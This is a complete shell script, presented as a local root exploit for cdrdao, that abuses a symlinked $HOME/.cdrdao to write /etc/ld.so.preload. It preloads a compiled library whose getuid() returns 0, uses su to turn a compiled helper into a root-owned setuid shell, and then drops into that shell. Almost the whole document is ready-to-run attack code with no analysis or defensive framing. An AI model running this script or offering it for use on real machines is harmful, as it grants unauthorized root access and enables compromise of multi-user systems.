#!/bin/sh

DIR=`pwd`

echo ""

echo "cdrdao local root exploit - gr doesn't protect you this time"

echo "Karol Wiêsek <appelast*drumnbass.art.pl>"

echo ""

sleep 2

umask 000

echo -n "[*] Checking if /etc/ld.so.preload doesn't exist ... "

if [ -f /etc/ld.so.preload ]; then

echo "WRONG"

echo "/etc/ld.so.preload exists, write another exploit ;P"

exit

else

echo "OK"

fi

echo -n "[*] Checking if su is setuid ... "

if [ -u /bin/su ];then

echo "OK"

else

echo "WRONG"

exit

fi

echo -n "[*] Creating evil *uid() library ... "

cat > getuid_lib.c << _EOF

int getuid(void) {

  return 0; }

_EOF

gcc -o getuid_lib.o -c getuid_lib.c

ld -shared -o getuid_lib.so getuid_lib.o

rm -f getuid_lib.c getuid_lib.o

if [ -f ./getuid_lib.so ]; then

echo "OK"

else

echo "WRONG"

fi

echo -n "[*] Creating suidshell ... "

cat > suid.c << _EOF

int main(void) {

  setgid(0); setuid(0);

  unlink("./suid");

  execl("/bin/sh","sh",0); }

_EOF

gcc -o suid suid.c

rm -f suid.c

if [ -x ./suid ];then

echo "OK"

else

echo "WRONG"

exit

fi

echo -n "[*] Exploiting cdrdao ... "

ln -sf /etc/ld.so.preload $HOME/.cdrdao

if [ ! -L $HOME/.cdrdao ];then

echo "Could'n link to \$HOME/.cdrdao"

exit

fi

cdrdao unlock --save 2>/dev/null

>/etc/ld.so.preload

echo "$DIR/getuid_lib.so" > /etc/ld.so.preload

su - -c "rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid"

if [ -s ./suid ];then

echo "OK"

else

echo "WRONG"

exit

fi

rm -f getuid_lib.so

unlink $HOME/.cdrdao

echo "Entering rootshell ... ;]"

./suid